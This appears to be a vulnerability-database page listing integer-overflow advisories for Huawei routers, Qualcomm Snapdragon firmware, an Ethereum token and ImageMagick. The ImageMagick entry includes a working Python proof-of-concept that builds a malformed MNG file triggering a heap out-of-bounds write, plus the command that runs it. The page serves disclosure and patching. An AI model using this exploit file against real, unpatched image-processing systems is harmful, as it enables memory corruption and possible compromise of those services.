CWE-190
AllowedInteger Overflow or Wraparound
Abstraction: Base · Status: Stable
The product performs a calculation that can produce an integer overflow or wraparound when the logic assumes that the resulting value will always be larger than the original value. This occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may become a very small or negative number.
3867 vulnerabilities reference this CWE, most recent first.
GHSA-QMXM-GF38-HM47
Vulnerability from github – Published: 2022-05-14 03:43 – Updated: 2022-05-14 03:43Huawei AR3200 with software V200R006C10, V200R006C11, V200R007C00, V200R007C01, V200R007C02, V200R008C00, V200R008C10, V200R008C20, V200R008C30 has an integer overflow vulnerability. The software does not sufficiently validate certain field in SCTP messages, a remote unauthenticated attacker could send a crafted SCTP message to the device. Successful exploit could system reboot.
{
"affected": [],
"aliases": [
"CVE-2017-15343"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-15T16:29:00Z",
"severity": "HIGH"
},
"details": "Huawei AR3200 with software V200R006C10, V200R006C11, V200R007C00, V200R007C01, V200R007C02, V200R008C00, V200R008C10, V200R008C20, V200R008C30 has an integer overflow vulnerability. The software does not sufficiently validate certain field in SCTP messages, a remote unauthenticated attacker could send a crafted SCTP message to the device. Successful exploit could system reboot.",
"id": "GHSA-qmxm-gf38-hm47",
"modified": "2022-05-14T03:43:42Z",
"published": "2022-05-14T03:43:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15343"
},
{
"type": "WEB",
"url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171129-01-sctp-en"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QMXQ-6R7J-56RW
Vulnerability from github – Published: 2022-01-14 00:02 – Updated: 2023-04-19 18:30Possible integer overflow due to improper validation of command length parameters while processing WMI command in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music
{
"affected": [],
"aliases": [
"CVE-2021-30319"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-13T12:15:00Z",
"severity": "HIGH"
},
"details": "Possible integer overflow due to improper validation of command length parameters while processing WMI command in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice \u0026 Music",
"id": "GHSA-qmxq-6r7j-56rw",
"modified": "2023-04-19T18:30:59Z",
"published": "2022-01-14T00:02:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30319"
},
{
"type": "WEB",
"url": "https://www.qualcomm.com/company/product-security/bulletins/january-2022-bulletin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QP22-5856-3546
Vulnerability from github – Published: 2022-05-14 03:04 – Updated: 2022-05-14 03:04The sell function of a smart contract implementation for STeX Exchange ICO (STE), an Ethereum token, has an integer overflow in which "amount * sellPrice" can be zero, consequently reducing a seller's assets.
{
"affected": [],
"aliases": [
"CVE-2018-13198"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-05T02:29:00Z",
"severity": "HIGH"
},
"details": "The sell function of a smart contract implementation for STeX Exchange ICO (STE), an Ethereum token, has an integer overflow in which \"amount * sellPrice\" can be zero, consequently reducing a seller\u0027s assets.",
"id": "GHSA-qp22-5856-3546",
"modified": "2022-05-14T03:04:54Z",
"published": "2022-05-14T03:04:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-13198"
},
{
"type": "WEB",
"url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/ETHEREUMBLACK/sell%20integer%20overflow.md"
},
{
"type": "WEB",
"url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/STE"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QP29-WXP5-WH82
Vulnerability from github – Published: 2025-08-25 16:23 – Updated: 2025-11-04 16:20Vulnerability Details
The magnified size calculations in ReadOneMNGIMage (in coders/png.c) are unsafe and can overflow, leading to memory corruption.
The source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured.
static Image *ReadOneMNGImage(MngReadInfo* mng_info,
const ImageInfo *image_info,ExceptionInfo *exception)
{
// Lots of stuff, this is effectively a state machine for the MNG rendering commands,
// skip to the point where we start processing the "MAGN" command.
if (memcmp(type,mng_MAGN,4) == 0)
{
png_uint_16
magn_first,
magn_last,
magn_mb,
magn_ml,
magn_mr,
magn_mt,
magn_mx,
magn_my,
magn_methx,
magn_methy;
// Details unimportant, but each of the `magn_xxx` variables is read from the file.
if (magn_first == 0 || magn_last == 0)
{
/* Save the magnification factors for object 0 */
mng_info->magn_mb=magn_mb;
mng_info->magn_ml=magn_ml;
mng_info->magn_mr=magn_mr;
mng_info->magn_mt=magn_mt;
mng_info->magn_mx=magn_mx;
mng_info->magn_my=magn_my;
mng_info->magn_methx=magn_methx;
mng_info->magn_methy=magn_methy;
}
}
// Details unimportant, we load the image to be scaled and store it in `image`
if (mng_type)
{
MngBox
crop_box;
if (((mng_info->magn_methx > 0) && (mng_info->magn_methx <= 5)) &&
((mng_info->magn_methy > 0) && (mng_info->magn_methy <= 5)))
{
png_uint_32
magnified_height,
magnified_width;
if (logging != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Processing MNG MAGN chunk");
if (image->columns == 1)
mng_info->magn_methx = 1;
if (image->rows == 1)
mng_info->magn_methy = 1;
if (mng_info->magn_methx == 1)
{
magnified_width=mng_info->magn_ml; // [0]
if (image->columns > 1)
magnified_width += mng_info->magn_mr; // [1]
if (image->columns > 2)
magnified_width += (png_uint_32)
((image->columns-2)*(mng_info->magn_mx)); // [2]
}
// Different cases handle available scaling kinds, all of which have similar issues...
// We now check whether the output image is larger than the input image in either
// dimension, and if so, we will allocate a new image buffer of size
// `magnified_width * magnified_height`.
if (magnified_height > image->rows ||
magnified_width > image->columns)
{
Image
*large_image;
// Snip...
large_image->columns=magnified_width;
large_image->rows=magnified_height;
magn_methx=mng_info->magn_methx;
magn_methy=mng_info->magn_methy;
// In between here, we allocate the pixel buffer for `large_image`.
/* magnify the rows into the right side of the large image */
if (logging != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Magnify the rows to %.20g",
(double) large_image->rows);
m=(ssize_t) mng_info->magn_mt;
yy=0;
length=(size_t) GetPixelChannels(image)*image->columns;
next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));
prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));
if ((prev == (Quantum *) NULL) ||
(next == (Quantum *) NULL))
{
if (prev != (Quantum *) NULL)
prev=(Quantum *) RelinquishMagickMemory(prev);
if (next != (Quantum *) NULL)
next=(Quantum *) RelinquishMagickMemory(next);
image=DestroyImageList(image);
ThrowReaderException(ResourceLimitError,
"MemoryAllocationFailed");
}
n=GetAuthenticPixels(image,0,0,image->columns,1,exception);
(void) memcpy(next,n,length);
for (y=0; y < (ssize_t) image->rows; y++)
{
if (y == 0)
m=(ssize_t) mng_info->magn_mt;
else if (magn_methy > 1 && y == (ssize_t) image->rows-2)
m=(ssize_t) mng_info->magn_mb;
else if (magn_methy <= 1 && y == (ssize_t) image->rows-1)
m=(ssize_t) mng_info->magn_mb;
else if (magn_methy > 1 && y == (ssize_t) image->rows-1)
m=1;
else
m=(ssize_t) mng_info->magn_my;
n=prev;
prev=next;
next=n;
if (y < (ssize_t) image->rows-1)
{
n=GetAuthenticPixels(image,0,y+1,image->columns,1,
exception);
(void) memcpy(next,n,length);
}
for (i=0; i < m; i++, yy++)
{
Quantum
*pixels;
assert(yy < (ssize_t) large_image->rows);
pixels=prev;
n=next;
q=GetAuthenticPixels(large_image,0,yy,large_image->columns,
1,exception);
if (q == (Quantum *) NULL)
break;
q+=(ptrdiff_t) (large_image->columns-image->columns)*
GetPixelChannels(large_image); // [3]
If we look at the calculation for magnified_width, we can see that we are storing the results in a png_uint32. The operations at [0] and [1] are safe, since mng_info->magn_ml and mng_info->magn_mx are both 16-bit unsigned integers, but both the multiplication at [2] and the addition of the result of that multiplication to magnified_width can overflow, leading to a value of magnified_width that is smaller than required.
When we then operate on the pixel buffers, we use the original parameters for the magnification, and we assume (reasonably?) that the output buffer is larger than the input buffer when calculating where to write the upsampled/magnified pixel values. Unfortunately, after the overflow has happened, this assumption is no longer true, and the calculation at [3] will end up with a q pointer outside the buffer bounds.
This issue leads to an out-of-bounds write of controlled data beyond the bounds of a heap allocation.
Triggering this issue requires an image with large columns or rows (\~65535) which should be prevented by all of the example security policies (which set width/height limits of 8KP).
Affected Version(s)
Verified on current HEAD (305e383c8ac7b30bc2ee96ab8c43ec96217ec2a9) and latest stable release (7.1.2-0).
Build Instructions
git clone https://github.com/imagemagick/imagemagick
cd imagemagick
export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address"
export CXXFLAGS="-fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared --disable-docs --with-jxl
make -j
Reproduction
Test Case
This testcase is a python script that will generate an MNG file with a MAGN chunk that triggers this overflow leading to an out-of-bounds heap write.
import struct
import zlib
def create_chunk(chunk_type, data):
crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
return struct.pack('>I', len(data)) + chunk_type + data + struct.pack('>I', crc)
# MNG signature
mng_signature = b'\x8aMNG\r\n\x1a\n'
# --- Dimensions ---
mhdr_width = 1
mhdr_height = 1
ihdr_width = 65538 # W: Original width to cause W' overflow
ihdr_height = 1 # H: Original height
# MHDR chunk (Valid small dimensions)
mhdr_data = struct.pack('>IIIIIII', mhdr_width, mhdr_height, 1, 0, 0, 0, 0)
mhdr_chunk = create_chunk(b'MHDR', mhdr_data)
# MAGN chunk: Trigger width overflow, force entry via height magn
magn_first = 0
magn_last = 0
magn_methx = 1
magn_mx = 65535 # -> magnified_width = 65534 (overflow)
magn_my = 2 # -> magnified_height = 2 (magn_mt=2)
magn_ml = 65535
magn_mr = 65535
magn_mt = 2 # Force magnified_height > H (necessary to trigger large_image path)
magn_mb = 1
magn_methy = 1
magn_data = struct.pack('>HHBHHHHHHB',
magn_first, magn_last,
magn_methx,
magn_mx, magn_my,
magn_ml, magn_mr,
magn_mt, magn_mb,
magn_methy)
magn_chunk = create_chunk(b'MAGN', magn_data)
# IHDR chunk
ihdr_data = struct.pack('>IIBBBBB', ihdr_width, ihdr_height, 8, 0, 0, 0, 0)
ihdr_chunk = create_chunk(b'IHDR', ihdr_data)
# IDAT chunk (Minimal data for W x H grayscale pixels)
scanline = b'\x00' + (b'\x00' * ihdr_width)
compressed_scanline = zlib.compress(scanline)
idat_chunk = create_chunk(b'IDAT', compressed_scanline)
# IEND chunk
iend_chunk = create_chunk(b'IEND', b'')
# MEND chunk
mend_chunk = create_chunk(b'MEND', b'')
program_input = (
mng_signature +
mhdr_chunk +
magn_chunk +
ihdr_chunk +
idat_chunk +
iend_chunk +
mend_chunk
)
print(f"Generated MNG size: {len(program_input)} bytes")
with open("magn_write.mng", "wb") as tmp:
tmp.write(program_input)
Command
python3 ./generate_testcase.py
utilities/magick ./magn_write.mng -resize 200x200 PNG:output.png
ASan Backtrace
=================================================================
==585863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f80849757d0 at pc 0x55744124fba3 bp 0x7fff1300ddf0 sp 0x7fff1300dde8
WRITE of size 4 at 0x7f80849757d0 thread T0
#0 0x55744124fba2 in SetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52
#1 0x55744123be16 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:27
#2 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
#3 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
#4 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
#5 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22
#6 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7
#7 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
#8 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
#9 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
#10 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
#11 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
#12 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#13 0x7f8087433d64 in __libc_start_main csu/../csu/libc-start.c:360:3
#14 0x557440d3f790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f2790) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)
0x7f80849757d0 is located 48 bytes before 1572816-byte region [0x7f8084975800,0x7f8084af57d0)
allocated by thread T0 here:
#0 0x557440de00cb in posix_memalign (/tmp/repro/imagemagick/utilities/magick+0x2930cb) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)
#1 0x557440e58aa6 in AcquireAlignedMemory_POSIX /tmp/repro/imagemagick/MagickCore/memory.c:300:7
#2 0x557440e5885d in AcquireAlignedMemory /tmp/repro/imagemagick/MagickCore/memory.c:378:10
#3 0x5574412e9725 in OpenPixelCache /tmp/repro/imagemagick/MagickCore/cache.c:3775:46
#4 0x5574412eead7 in GetImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:1782:18
#5 0x5574412ef71b in SyncImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:5600:28
#6 0x557440e2e786 in SetImageStorageClass /tmp/repro/imagemagick/MagickCore/image.c:2617:10
#7 0x557440e2f075 in SetImageBackgroundColor /tmp/repro/imagemagick/MagickCore/image.c:2422:7
#8 0x55744123b3d6 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6560:28
#9 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
#10 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
#11 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
#12 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22
#13 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7
#14 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
#15 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
#16 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
#17 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
#18 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
#19 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 in SetPixelRed
Shadow bytes around the buggy address:
0x7f8084975500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7f8084975700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x7f8084975780: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa
0x7f8084975800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7f8084975a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==585863==ABORTING
Reporter Credit
Google Big Sleep
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-55154"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-25T16:23:09Z",
"nvd_published_at": "2025-08-13T14:15:33Z",
"severity": "HIGH"
},
"details": "## **Vulnerability Details**\n\nThe magnified size calculations in `ReadOneMNGIMage` (in `coders/png.c`) are unsafe and can overflow, leading to memory corruption.\n\nThe source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured.\n\n```c\nstatic Image *ReadOneMNGImage(MngReadInfo* mng_info,\n const ImageInfo *image_info,ExceptionInfo *exception)\n{\n\n// Lots of stuff, this is effectively a state machine for the MNG rendering commands,\n// skip to the point where we start processing the \"MAGN\" command.\n\n if (memcmp(type,mng_MAGN,4) == 0)\n {\n png_uint_16\n magn_first,\n magn_last,\n magn_mb,\n magn_ml,\n magn_mr,\n magn_mt,\n magn_mx,\n magn_my,\n magn_methx,\n magn_methy;\n\n// Details unimportant, but each of the `magn_xxx` variables is read from the file.\n\n if (magn_first == 0 || magn_last == 0)\n {\n /* Save the magnification factors for object 0 */\n mng_info-\u003emagn_mb=magn_mb;\n mng_info-\u003emagn_ml=magn_ml;\n mng_info-\u003emagn_mr=magn_mr;\n mng_info-\u003emagn_mt=magn_mt;\n mng_info-\u003emagn_mx=magn_mx;\n mng_info-\u003emagn_my=magn_my;\n mng_info-\u003emagn_methx=magn_methx;\n mng_info-\u003emagn_methy=magn_methy;\n }\n }\n\n// Details unimportant, we load the image to be scaled and store it in `image`\n\n if (mng_type)\n {\n MngBox\n crop_box;\n\n if (((mng_info-\u003emagn_methx \u003e 0) \u0026\u0026 (mng_info-\u003emagn_methx \u003c= 5)) \u0026\u0026\n ((mng_info-\u003emagn_methy \u003e 0) \u0026\u0026 (mng_info-\u003emagn_methy \u003c= 5)))\n {\n png_uint_32\n magnified_height,\n magnified_width;\n\n if (logging != MagickFalse)\n (void) LogMagickEvent(CoderEvent,GetMagickModule(),\n \" Processing MNG MAGN chunk\");\n\n if (image-\u003ecolumns == 1)\n mng_info-\u003emagn_methx = 1;\n if (image-\u003erows == 1)\n mng_info-\u003emagn_methy = 1;\n if (mng_info-\u003emagn_methx == 1)\n {\n magnified_width=mng_info-\u003emagn_ml; // [0]\n \n if (image-\u003ecolumns \u003e 1)\n magnified_width += mng_info-\u003emagn_mr; // [1]\n\n if (image-\u003ecolumns \u003e 2)\n magnified_width += (png_uint_32)\n ((image-\u003ecolumns-2)*(mng_info-\u003emagn_mx)); // [2]\n }\n\n// Different cases handle available scaling kinds, all of which have similar issues...\n\n// We now check whether the output image is larger than the input image in either\n// dimension, and if so, we will allocate a new image buffer of size\n// `magnified_width * magnified_height`.\n\n if (magnified_height \u003e image-\u003erows ||\n magnified_width \u003e image-\u003ecolumns)\n {\n Image\n *large_image;\n\n// Snip...\n\n large_image-\u003ecolumns=magnified_width;\n large_image-\u003erows=magnified_height;\n\n magn_methx=mng_info-\u003emagn_methx;\n magn_methy=mng_info-\u003emagn_methy;\n\n// In between here, we allocate the pixel buffer for `large_image`.\n\n /* magnify the rows into the right side of the large image */\n\n if (logging != MagickFalse)\n (void) LogMagickEvent(CoderEvent,GetMagickModule(),\n \" Magnify the rows to %.20g\",\n (double) large_image-\u003erows);\n m=(ssize_t) mng_info-\u003emagn_mt;\n yy=0;\n length=(size_t) GetPixelChannels(image)*image-\u003ecolumns;\n next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));\n prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));\n\n if ((prev == (Quantum *) NULL) ||\n (next == (Quantum *) NULL))\n {\n if (prev != (Quantum *) NULL)\n prev=(Quantum *) RelinquishMagickMemory(prev);\n if (next != (Quantum *) NULL)\n next=(Quantum *) RelinquishMagickMemory(next);\n image=DestroyImageList(image);\n ThrowReaderException(ResourceLimitError,\n \"MemoryAllocationFailed\");\n }\n\n n=GetAuthenticPixels(image,0,0,image-\u003ecolumns,1,exception);\n (void) memcpy(next,n,length);\n\n for (y=0; y \u003c (ssize_t) image-\u003erows; y++)\n {\n if (y == 0)\n m=(ssize_t) mng_info-\u003emagn_mt;\n\n else if (magn_methy \u003e 1 \u0026\u0026 y == (ssize_t) image-\u003erows-2)\n m=(ssize_t) mng_info-\u003emagn_mb;\n\n else if (magn_methy \u003c= 1 \u0026\u0026 y == (ssize_t) image-\u003erows-1)\n m=(ssize_t) mng_info-\u003emagn_mb;\n\n else if (magn_methy \u003e 1 \u0026\u0026 y == (ssize_t) image-\u003erows-1)\n m=1;\n\n else\n m=(ssize_t) mng_info-\u003emagn_my;\n\n n=prev;\n prev=next;\n next=n;\n\n if (y \u003c (ssize_t) image-\u003erows-1)\n {\n n=GetAuthenticPixels(image,0,y+1,image-\u003ecolumns,1,\n exception);\n (void) memcpy(next,n,length);\n }\n\n for (i=0; i \u003c m; i++, yy++)\n {\n Quantum\n *pixels;\n\n assert(yy \u003c (ssize_t) large_image-\u003erows);\n pixels=prev;\n n=next;\n q=GetAuthenticPixels(large_image,0,yy,large_image-\u003ecolumns,\n 1,exception);\n if (q == (Quantum *) NULL)\n break;\n q+=(ptrdiff_t) (large_image-\u003ecolumns-image-\u003ecolumns)*\n GetPixelChannels(large_image); // [3]\n```\n\nIf we look at the calculation for `magnified_width`, we can see that we are storing the results in a `png_uint32`. The operations at \\[0\\] and \\[1\\] are safe, since `mng_info-\u003emagn_ml` and `mng_info-\u003emagn_mx` are both 16-bit unsigned integers, but both the multiplication at \\[2\\] and the addition of the result of that multiplication to `magnified_width` can overflow, leading to a value of `magnified_width` that is smaller than required.\n\nWhen we then operate on the pixel buffers, we use the original parameters for the magnification, and we assume (reasonably?) that the output buffer is larger than the input buffer when calculating where to write the upsampled/magnified pixel values. Unfortunately, after the overflow has happened, this assumption is no longer true, and the calculation at \\[3\\] will end up with a `q` pointer outside the buffer bounds.\n\nThis issue leads to an out-of-bounds write of controlled data beyond the bounds of a heap allocation.\n\nTriggering this issue requires an `image` with large `columns` or `rows` (\\~65535) which should be prevented by all of the example security policies (which set `width`/`height` limits of `8KP`).\n\n## **Affected Version(s)**\n\nVerified on current HEAD (305e383c8ac7b30bc2ee96ab8c43ec96217ec2a9) and latest stable release (7.1.2-0).\n\n### **Build Instructions**\n\n```shell\ngit clone https://github.com/imagemagick/imagemagick\ncd imagemagick\n\nexport CC=clang\nexport CXX=clang++\nexport CFLAGS=\"-fsanitize=address\"\nexport CXXFLAGS=\"-fsanitize=address\"\nexport LDFLAGS=\"-fsanitize=address\"\n\n./configure --disable-shared --disable-docs --with-jxl\nmake -j\n```\n\n## **Reproduction**\n\n### **Test Case**\n\nThis testcase is a python script that will generate an MNG file with a MAGN chunk that triggers this overflow leading to an out-of-bounds heap write.\n\n```\nimport struct\nimport zlib\n\ndef create_chunk(chunk_type, data):\n crc = zlib.crc32(chunk_type + data) \u0026 0xFFFFFFFF\n return struct.pack(\u0027\u003eI\u0027, len(data)) + chunk_type + data + struct.pack(\u0027\u003eI\u0027, crc)\n\n# MNG signature\nmng_signature = b\u0027\\x8aMNG\\r\\n\\x1a\\n\u0027\n\n# --- Dimensions ---\nmhdr_width = 1\nmhdr_height = 1\nihdr_width = 65538 # W: Original width to cause W\u0027 overflow\nihdr_height = 1 # H: Original height\n\n# MHDR chunk (Valid small dimensions)\nmhdr_data = struct.pack(\u0027\u003eIIIIIII\u0027, mhdr_width, mhdr_height, 1, 0, 0, 0, 0)\nmhdr_chunk = create_chunk(b\u0027MHDR\u0027, mhdr_data)\n\n# MAGN chunk: Trigger width overflow, force entry via height magn\nmagn_first = 0\nmagn_last = 0\nmagn_methx = 1\nmagn_mx = 65535 # -\u003e magnified_width = 65534 (overflow)\nmagn_my = 2 # -\u003e magnified_height = 2 (magn_mt=2)\nmagn_ml = 65535\nmagn_mr = 65535\nmagn_mt = 2 # Force magnified_height \u003e H (necessary to trigger large_image path)\nmagn_mb = 1\nmagn_methy = 1\n\nmagn_data = struct.pack(\u0027\u003eHHBHHHHHHB\u0027,\n magn_first, magn_last,\n magn_methx,\n magn_mx, magn_my,\n magn_ml, magn_mr,\n magn_mt, magn_mb,\n magn_methy)\nmagn_chunk = create_chunk(b\u0027MAGN\u0027, magn_data)\n\n# IHDR 